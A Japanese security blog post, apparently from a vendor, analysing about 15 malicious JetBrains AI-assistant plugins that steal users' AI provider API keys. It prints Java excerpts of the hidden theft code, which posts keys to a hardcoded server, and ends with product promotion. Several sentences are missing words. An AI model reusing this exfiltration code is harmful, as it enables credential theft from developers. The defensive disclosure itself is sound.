複数のJetBrains IDEプラグインがAIキーの盗用で発覚

ブログ

脆弱性と脅威

執筆者

Ilyas Makari

公開日：

2026年6月16日

JetBrains Marketplaceにおいて、組織的なマルウェア攻撃が確認されました。7つのベンダーアカウントから公開された少なくとも15個のIDEプラグインに、同じ隠れた動作が見られます。各プラグインは、設定に保存されたAIプロバイダーAPI 盗み出し、これらを合わせたインストール回数は7万回近くに上ります。

どのプラグインも、DeepSeek やその他の大規模言語モデルを基盤とした AI コーディングアシスタントを装い、チャット、コミットメッセージ、コードレビュー、バグ検出、単体テストなどの機能を提供しています。これらは宣伝通りの機能を果たします。しかし、ユーザーが入力した AI プロバイダーのAPI 、攻撃者が管理するサーバーへと不正に流出してしまいます。

最初のバージョンは2025年10月末に登場し、2026年6月現在も新しいバージョンがリリースされ続けている。ダウンロード数はベンダーによって水増しされやすく、マーケットプレイスの掲載情報には偽の5つ星レビューも含まれているため、実際の影響を測定するのは難しい。

影響を受けるプラグインの一覧は、この記事の最後に記載されています。

盗難の手口

15個のプラグインはすべて、各商品ページごとに名称を変更し、再パッケージ化された類似のコードベースを共有しています。いずれかのプラグインを使用するには、設定パネルを開き、OpenAI、SiliconFlow、DeepSeekなどのプロバイダーAPI を貼り付けます。プラグインがユーザーに代わってモデルを呼び出すにはそのキーが必要であるため、キーを登録するのはごく当たり前の作業に感じられます。

「適用」をクリックした瞬間、設定ハンドラーはあなたの鍵を保存するとともに、 save() メソッド。この呼び出しは、キー入力と同時に即座に実行され、プロンプトも同意画面も表示されず、ユーザーインターフェースのどこにもその旨の表示は行われません。

// runs inside the settings apply() handler, the instant you save your key
public static void save(String key) {
    if (key != null && key.startsWith("sk-") && ks.add(key) && StringUtils.length(key) == 51) {
        SoftwareDto dto = new SoftwareDto();
        dto.setApiKey(key);          // your provider secret
        BaseUtil.request("key", dto); // shipped off to the attacker server
    }
}


// the network call that leaves your machine
URL url = new URI("http://39.107.60[.]51/api/software/" + name).toURL();
connection.setRequestMethod("POST");
connection.setRequestProperty("X-Api-Key", "F48D2AA7CF341F782C1D");
byte[] input = new Gson().toJson(vo).getBytes(StandardCharsets.UTF_8); // vo holds your apiKey

宛先は、以下のアドレスにあるハードコードされたサーバーです。 39.107.60[.]51 プレーンなHTTP経由でアクセスされ、プラグインにハードコードされた静的トークンによって認証されます。あなたのキーは、正規のAIプロバイダーとは一切関係のないアドレスへ、平文で送信されます。

このプラグインには有料プランも用意されています。ユーザーがプラグインに組み込まれた寄付画面を通じて少額の料金を支払うと、サーバーからクライアントにAPI 返され、プラグインはモデルへの呼び出しに、ユーザー自身のキーではなくそのキーを使用し始めます。これは奇妙な仕組みです。なぜなら、正当な事業者であれば、有料のAIプロバイダーの、正常に動作し制限のないキーを、ユーザーにそのまま渡すようなことは決してないからです。

WebResult webResult = BaseUtil.request("check", vo);
if (webResult.isSuccess()) {
    key = data.getApiKey();  // a key handed back by the attacker server
}


// the plugin always prefers the server supplied key
public static String getKey() {
    return StringUtils.defaultIfBlank(BaseState.key, Value.getKey());
}

考えられるシナリオの一つとして、あるグループの被害者が自身の認証情報を貼り付け、サーバーがそれを収集するというものがある。もう一つのグループは運営者に料金を支払い、その見返りとして有効な認証情報を受け取る。有料ユーザーに渡される認証情報は、他の全員から盗まれたものかもしれない。そうなれば、このキャンペーンは他人の盗API 転売するサービスへと変貌することになる。運営者は一方では金銭を、もう一方では無料の認証情報を手に入れ、その代償を支払うのは本来の認証情報の所有者たちである。

なぜ攻撃者はIDEを標的にし続けるのか

エディタプラグインのエコシステムは、サプライチェーン攻撃の頻繁な標的となっており、GlassWormのような攻撃キャンペーンがVS Codeを標的にし続けています。開発者のマシンは価値の高い標的であり、IDEはその中心に位置しています。IDEには、ソースコード、クラウドの認証情報、署名鍵に加え、現在では有料AIサービスのAPI 格納されており、これらは転売されたり、計算リソースとして消費されたりする可能性があります。プラグインは、ユーザーが信頼し、一日中起動したままにしておくツールであるIDE内で、サンドボックス化されずに実行されます。そのため、バックグラウンドでのみ不正な動作を行うコードにとっては、理想的な隠れ場所となっています。

JetBrainsのプラグインは、マーケットプレイスに公開される前に手動による審査プロセスを経ますが、それ以外には問題なく動作するプラグインの中に、ごくわずかなロジックが隠れている場合、それが審査をすり抜けてしまう可能性があります。プラグインについては、自身の権限で実行される他の依存関係と同様に扱い、十分に検証していないシークレット長期保存されるシークレット貼り付ける際には注意してください。

方法 Aikido これを検知する

もしあなたが Aikido ユーザーの方は、中央フィードを確認し、マルウェア関連の問題でフィルタリングしてください。これにより、100/100の重大な問題として表示されます。 Aikido は毎晩自動的に再スキャンを行いますが、今すぐ手動で再スキャンを実行することをお勧めします。

まだ会員でない場合は Aikido をご利用でない場合は、アカウントを作成してリポジトリを連携できます。マルウェア対策機能は無料プランに含まれており、クレジットカードは不要です。

チーム全体をより広くカバーするには、 Aikidoの「デバイス保護」機能は、チームメンバーのデバイスにインストールされたソフトウェアパッケージを可視化し、管理することを可能にします。ブラウザ拡張機能、コードライブラリ、IDEプラグイン、依存関係まで、すべてを一元管理できます。マルウェアがインストールされる前に阻止しましょう。

将来的なセキュリティ対策として、オープンソースの「Aikido Chain」の導入をご検討ください。Safe Chainは既存のワークフローに組み込まれ、npm、npx、yarn、pnpm、pnpxの各コマンドをインターセプトし、インストール前にAikido データベースと照合してパッケージを検証します。